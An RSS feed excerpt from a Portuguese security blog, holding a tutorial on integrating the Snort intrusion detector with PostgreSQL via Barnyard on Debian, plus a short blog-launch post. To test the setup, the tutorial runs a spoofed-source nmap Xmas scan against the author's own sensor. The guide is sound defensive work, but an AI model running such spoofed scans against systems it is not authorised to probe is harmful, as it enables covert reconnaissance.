		<title>Instalação e integração Snort, PostgreSQL e Barnyard</title>
		<link>http://ulissescastro.wordpress.com/2008/04/22/instalacao-e-integracao-snort-postgresql-e-barnyard/</link>
		<comments>http://ulissescastro.wordpress.com/2008/04/22/instalacao-e-integracao-snort-postgresql-e-barnyard/#comments</comments>
		<pubDate>Wed, 23 Apr 2008 01:51:47 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Debian]]></category>
		<category><![CDATA[PostgreSQL]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Snort]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=7</guid>
		<description><![CDATA[Enjoy&#8230;
ObjetivoInstalação do Snort com gravação de log unificado (unified log), instlação do PostgreSQL 8.1 à partir dos pacotes pré-compilados para distribuição Debian Etch e também a compilação e configuração do aplicativo Barnyard, utilitário responsável pela leitura dos logs unificados e envio das informações para o banco de dados PostgreSQL.
Configurações utilizadas:
 * Hostname: nids * Interface [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=7&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Enjoy&#8230;</p>
<p><strong>Objetivo</strong><br />Instalação do Snort com gravação de log unificado (<strong>unified log</strong>), instlação do PostgreSQL 8.1 à partir dos pacotes pré-compilados para distribuição Debian Etch e também a compilação e configuração do aplicativo Barnyard, utilitário responsável pela leitura dos logs unificados e envio das informações para o banco de dados PostgreSQL.</p>
<p><strong>Configurações utilizadas:</strong></p>
<p> * Hostname: nids<br /> * Interface de rede: eth0<br /> * Endereço IP: 192.168.0.133<br /> * Endereço de rede: 192.168.0.0/24</p>
<p>Ao final dos procedimentos a seguir, estarão instalados:</p>
<p> * PostgreSQL 8.1<br /> * Snort Version 2.3.3 (Build 14)<br /> * Barnyard Version 0.2.0 (Build 32)</p>
<p><strong>Instalação PostgreSQL</strong></p>
<p>Para instalar utilize:<br /># aptitude install postgresql-8.1</p>
<p>Crie a base de dados e o usuário que irá utilizá-la:<br /># su &#8211; postgres</p>
<p>Crie a base de dados:<br />$ createdb snort</p>
<p>Crie o usuário que será utilizado pelo Snort, usuário &quot;snort&quot;:<br />$ createuser -P snort<br />Digite a senha para a nova role: snort123[ENTER]<br />Digite-a novamente: snort123[ENTER]<br />A nova role poderá criar um super-usuário? (s/n) n<br />A nova role poderá criar bancos de dados? (s/n) n<br />A nova role poderá criar novas roles? (s/n) n<br />CREATE ROLE</p>
<p><em>* Neste tutorial estou utilizando uma senha fraca, para instalações em produção recomendo utilizar senhas robustas, onde na sua criação utilize letras maiúsculas e minúsculas, números, símbolos com pelo menos dez caracteres.</em></p>
<p>Crie regra para acesso local à base de dados snort para o usuário snort.</p>
<p><em>* Também não recomendo o uso de nomes com fácil dedução, tanto para o banco de dados como para o usuário que o utiliza, em produção modifique isto também.</em></p>
<p>Como usuário root, edite o arquivo /etc/postgresql/8.1/main/pg_hba.conf, e abaixo da entrada:</p>
<p>(&#8230;)<br /># Database administrative login by UNIX sockets<br />local all postgres ident sameuser<br />(&#8230;)</p>
<p>Acrescente:<br />local snort snort md5</p>
<p>Salve o arquivo e saia.<br />Explicando:<br />local &#8211; Origem da conexão feita ao banco de dados;<br />snort &#8211; Nome da base de dados;<br />snort &#8211; Nome do usuário que tem permissão de acesso;<br />md5 &#8211; Método utilizado para autenticação.</p>
<p>Reinicie o serviço PostgreSQL:<br /># invoke-rc.d postgresql-8.1 stop<br /># invoke-rc.d postgresql-8.1 start</p>
<p>Verifique se o PostgreSQL está ouvindo na porta 5432 e aguardando por conexões locais:<br /># lsof -i -n -P | grep 5432</p>
<p>Logo, será configurado a estrutura para base de dados do Snort&#8230;</p>
<p><strong>Instalação Snort</strong></p>
<p>Para instalar o Snort com o suporte a PostgreSQL no Debian, utilize:<br /># aptitude install snort-pgsql</p>
<p>Serão feitas perguntas, na primeira irá questionar qual é sua rede, para este documento adotamos a seguinte rede:<br />192.168.0.0/24</p>
<p>Na segunda pergunta, responda NÃO, afinal não queremos que o Snort guarde seus log em um banco de dados e sim em um arquivo de log unificado para utilização com Barnyard, que demonstro logo a seguir.</p>
<p>Por precaução, faça uma cópia de segurança do arquivo de configuração:<br /># cp -av /etc/snort/snort.conf /etc/snort/snort.conf.original<br /># cp -av /etc/snort/snort.debian.conf /etc/snort/snort.debian.conf.original</p>
<p>Na distribuição Debian Etch, dentro de /etc/snort existe um arquivo chamado snort.debian.conf onde algumas configurações específicas são definidas, edite o arquivo e faça as seguintes modificações:</p>
<p>DEBIAN_SNORT_STARTUP=&quot;boot&quot;<br />DEBIAN_SNORT_HOME_NET=&quot;192.168.0.0/24&quot;<br />DEBIAN_SNORT_INTERFACE=&quot;eth0&quot;</p>
<p>Explicando:<br />DEBIAN_SNORT_STARTUP – Diz ao Snort que deve iniciar na inicialização do sistema operacional;<br />DEBIAN_SNORT_HOME_NET &#8211; Define sua rede local;<br />DEBIAN_SNORT_INTERFACE &#8211; A interface que o snort ficará ouvindo.</p>
<p>Edite o arquivo snort.conf procure pela entrada var HOME_NET any e configure:</p>
<p>var HOME_NET 192.168.0.0/24</p>
<p>Definindo a forma de log que o Snort gravará os logs, para utilização em conjunto com o Barnyard é preciso que utilize o método de log unificado (unified log). Procure pelas linhas abaixo e descomente-as:</p>
<p>output alert_unified: filename snort.alert, limit 128<br />output log_unified: filename snort.log, limit 128</p>
<p>Salve o arquivo, saia.<br />Explicando:<br />filename &#8211; Nome do arquivo onde ficarão gravados os logs;<br />limit &#8211; Tamanho máximo até seu rotacionamento. (128mb)</p>
<p>O log unificado (unified log) faz com que o Snort grave suas mensagens em formato octal em um arquivo binário, com isto, ganha-se muito desempenho pois o Snort não precisa parar seu processamento de pacotes para executar os INSERTS no banco de dados.</p>
<p>* De acordo com algumas notas postadas em diversos blogs pela internet, não teremos esta perda de performance no Snort 3.0 pois utilizará um sistema de processamento diferente do atual, novas features e outras informações sobre o snort 3.0 ficam para um próximo post. ;)</p>
<p>Para verifcar onde o Snort grava seus arquivos de log, entre outras definições (Debian):<br /># cat /etc/default/snort</p>
<p>Para iniciar o Snort, remova antes o arquivo:<br /># rm /etc/snort/db-pending-config</p>
<p>Inicie o serviço do Snort:<br /># invoke-rc.d snort start</p>
<p>Verifique o status do serviço:<br /># invoke-rc.d snort status</p>
<p>O resultado deve ser este:<br />Status of snort daemon(s): eth0 (ok).</p>
<p><strong>Criando estrutura para base de dados do Snort</strong></p>
<p>Torne-se usuário postgres novamente:<br /># su &#8211; postgres</p>
<p>Com o script sql fornecido pelo pacote snort-pgsql, crie as tabelas necessárias:<br />$ zcat /usr/share/doc/snort-pgsql/create_postgresql.gz | psql -U postgres snort</p>
<p>Dê permissão somente para consultar, atualizar e inserir nas seguintes tabelas ao usuário snort:<br />$ psql -U postgres snort -c &quot;GRANT INSERT, SELECT, UPDATE ON TABLE data,detail,encoding,event,icmphdr,iphdr,opt,reference,reference_system,schema,sensor,sig_class,signature,sig_reference,tcphdr,udphdr TO snort;&quot;</p>
<p>E também para atualizar as tabelas sequenciais:<br />$ psql -U postgres snort -c &quot;GRANT UPDATE ON reference_ref_id_seq,reference_system_ref_system_id_seq,sensor_sid_seq,sig_class_sig_class_id_seq,signature_sig_id_seq TO snort;&quot;</p>
<p>Volte a ser usuário root:<br />$ exit</p>
<p><strong>Instalação Barnyard</strong></p>
<p>Barnyard foi desenvolvido com o objetivo de ler os arquivos de log unificados e enviar seu conteúdo ao banco, desta forma diminuindo o serviço &quot;braçal&quot; de inserir os logs no banco assim aumenando a performance do Snort como já foi mencionado.</p>
<p>Acesse o diretório:<br /># cd /usr/src/</p>
<p>E baixe o Barnyard:<br /># wget http://www.snort.org/dl/barnyard/barnyard-0.2.0.tar.gz</p>
<p>Descompacte e acesse o diretório:<br /># tar xvzf barnyard-0.2.0.tar.gz<br /># cd barnyard-0.2.0</p>
<p>Para instalar o Barnyard com suporte a PostgreSQL no Debian Etch, supra as dependências instalando os pacotes:<br /># aptitude install build-essential postgresql-server-dev-8.1</p>
<p>Para ativar o suporte a PostgreSQL utilize o parâmetro &#8211;enable-postgres ao configurar:<br /># ./configure &#8211;enable-postgres</p>
<p>Compile e instale:<br /># make &amp;&amp; make install</p>
<p>Será instalado dentro de /usr/local/bin o executável barnyard e um arquivo de exemplo para configuração é criado no diretório /usr/src/barnyard-0.2.0/etc, mas não será utilizado.</p>
<p>Para organizar, crie e acesse o diretório:<br /># mkdir /etc/snort/barnyard<br /># cd /etc/snort/barnyard</p>
<p>Crie os arquivos de configuração para o Barnyard:<br /># vi barnyard.conf<br />config localtime<br />config hostname: nids<br />config interface: eth0<br />config sid-msg-map: /etc/snort/sid-msg.map<br />config gen-msg-map: /etc/snort/gen-msg.map<br />config class-file: /etc/snort/classifications.config<br />output alert_acid_db: postgres, database snort, server localhost, user snort, password snort123, detail full</p>
<p>Salve, saia e defina as permissões para o arquivo de configuração:<br />chown root:snort /etc/snort/barnyard/barnyard.conf<br />chmod 640 /etc/snort/barnyard/barnyard.conf</p>
<p>Crie o diretório e defina as permissões onde serão guardados os logs processados pelo Barnyard:<br /># mkdir /var/log/snort/processados<br /># chmod 2750 /var/log/snort/processados</p>
<p>Primeiramente faça o teste executando em dois terminais distintos o Barnyard sem a opção (-D) que o transforma em serviço.<br />Em um terminal, execute-o apontando para o arquivo de log unificado snort.log:<br /># /usr/local/bin/barnyard -c /etc/snort/barnyard/barnyard.conf -d /var/log/snort -a /var/log/snort/processados -f snort.log -w /etc/snort/barnyard/snort.log.bookmark</p>
<p>Em outro terminal execute apontando para o arquivo de log unificado snort.alert:<br /># /usr/local/bin/barnyard -c /etc/snort/barnyard/barnyard.conf -d /var/log/snort -a /var/log/snort/processados -f snort.alert -w /etc/snort/barnyard/snort.log.bookmark</p>
<p>Os terminais ficarão presos com uma mensagem similar a esta:<br />Barnyard Version 0.2.0 (Build 32)<br />Opened spool file &#8216;/var/log/snort/snort.log.1206731745&#8242;<br />Waiting for new data</p>
<p>Pare os dois Barnyards agora (Ctrl+C) e inicie-os como serviço.</p>
<p>Um apontando para o snort.log:<br /># /usr/local/bin/barnyard -c /etc/snort/barnyard/barnyard.conf -d /var/log/snort -a /var/log/snort/processados -f snort.log -w /etc/snort/barnyard/snort.log.bookmark -D</p>
<p>E outro apontando para snort.alert:<br /># /usr/local/bin/barnyard -c /etc/snort/barnyard/barnyard.conf -d /var/log/snort -a /var/log/snort/processados -f snort.alert -w /etc/snort/barnyard/snort.alert.bookmark -D</p>
<p>Explicando:<br />-c &#8211; Define o arquivo de configuração;<br />-d &#8211; Diretório onde será feito a busca pelos arquivos de log;<br />-a &#8211; Diretório onde serão guardados os aquivos que já foram processados;<br />-f &#8211; Arquivo de log unificado que o Barnyard processará;<br />-w &#8211; Arquivo utilizado para bookmark;<br />-D &#8211; Transforma-o em serviço.</p>
<p>Bookmark é utilizado para que o Barnyard lembre-se de onde parou caso ocorra algum problema, desta forma não sendo necessário processar novamente todo o arquivo de log.<br />O ambiente Snort, PostgreSQL e Barnyard está funcionando, abaixo demonstro uma forma de testar.</p>
<p><strong>Colocando à prova</strong></p>
<p>Para testar, de uma outra máquina faça uma varredura onde o Snort possa registrar algo, rode um Nmap:<br /># nmap -e &lt;interface&gt; -S &lt;IP spoofado&gt; -sX &lt;IP do alvo&gt;</p>
<p>Neste ambiente com estas configurações foi executado:<br /># nmap -e eth0 -S 10.10.10.10 -sX 192.168.0.133</p>
<p>Depois acesse a base de dados snort com usuário snort:<br /># psql -U snort snort</p>
<p>E faça uma consulta:<br />SELECT * from signature;</p>
<p>E também:<br />SELECT * from event;</p>
<p>Aparecerão informações registradas pelo Snort e enviadas pelo Barnyard.</p>
<p><strong>Conclusão</strong><br />A solução Snort, Barnyard e PostgreSQL é recomendada, quando bem posicionada na topologia. O Barnyard completa a solução do Snort, tornando-o mais rápido pois com a utilização dos logs unificados não se desperdiça tempo em executar sql&#8217;s para enviar seus logs ao banco, ganhando desta forma muito desempenho.</p>
<p><strong>Referências</strong></p>
<p><a href="http://www.snort.org">http://www.snort.org</a><br /><a href="http://www.postgresql.org">http://www.postgresql.org</a><br /><a href="http://www.snort.org/dl/barnyard/">http://www.snort.org/dl/barnyard/</a><br /><a href="http://www.snorg.org.br/">http://www.snorg.org.br/</a></p>
<p>Decidi postar este tutorial pois mesmo procurando muito na internet não encontrei informações de como utilizar o Barnyard em conjunto com o banco de dados PostgreSQL, espero que ajude outras pessoas.</p>
<p>Fiquem à vontade para sugestões, críticas e correções&#8230;</p>
<p>Obrigado! Abraços e até o próximo post! ;)</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ulissescastro.wordpress.com/7/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ulissescastro.wordpress.com/7/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/7/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=7&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/04/22/instalacao-e-integracao-snort-postgresql-e-barnyard/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
		<title>Quebrando a paranóia!</title>
		<link>http://ulissescastro.wordpress.com/2007/12/24/quebrando-a-paranoia/</link>
		<comments>http://ulissescastro.wordpress.com/2007/12/24/quebrando-a-paranoia/#comments</comments>
		<pubDate>Mon, 24 Dec 2007 00:48:39 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Announce]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/2007/12/24/quebrando-a-paranoia/</guid>
		<description><![CDATA[Saudações galera!
É isso ae&#8230; criei um blog, quem diria&#8230;
Como todo aficionado por segurança criar um blog utilizando o próprio nome e (argh!) sobrenome é uma grande barreira à ser quebrada.
Após algumas boas conversas e também experiências trocadas com amigo (Fernando Ike), decidi criar meu blog.
Este é meu pontapé inicial para colaborar e também retribuir tudo [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=3&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Saudações galera!</p>
<p>É isso ae&#8230; criei um blog, quem diria&#8230;</p>
<p>Como todo aficionado por segurança criar um blog utilizando o próprio nome e (<strong>argh!</strong>) sobrenome é uma grande barreira à ser quebrada.</p>
<p>Após algumas boas conversas e também experiências trocadas com amigo (Fernando Ike), decidi criar meu blog.</p>
<p>Este é meu pontapé inicial para colaborar e também retribuir tudo que o software livre e a comunidade tem me proporcionado ao longo de anos.</p>
<p>Neste momento não estou em um lugar onde posso filosofar e escrever muito, portanto finalizo aqui.</p>
<p>Ah! Claro, este blog utilizarei como um bloco de anotações onde registrarei todas as minhas experiências no mundo do software livre, segurança computacional e afins&#8230;</p>
<p>abraços e até o próximo&#8230; ;-)</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ulissescastro.wordpress.com/3/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ulissescastro.wordpress.com/3/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/3/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=3&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2007/12/24/quebrando-a-paranoia/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
	</channel>
</rss>